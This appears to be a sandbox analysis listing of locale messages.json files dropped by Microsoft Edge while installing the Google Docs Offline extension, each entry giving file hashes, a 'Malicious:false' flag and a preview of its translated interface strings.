                                                                                                                                                                                                                                                                                                      SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1244
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                      MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                      SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                      SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                      SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):977
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                      MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                      SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                      SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                      SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):3107
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                      MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                      SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                      SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                      SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1389
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                      MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                      SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                      SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                      SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1763
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                      MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                      SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                      SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                      SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):930
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                      MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                      SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                      SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                      SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):913
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                      MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                      SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                      SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                      SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):806
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                      MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                      SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                      SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                      SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):883
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                      MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                      SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                      SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                      SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1031
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                      MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                      SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                      SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                      SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1613
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                      MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                      SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                      SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                      SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):851
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                      MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                      SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                      SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                      SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):851
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                      MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                      SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                      SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                      SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):848
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
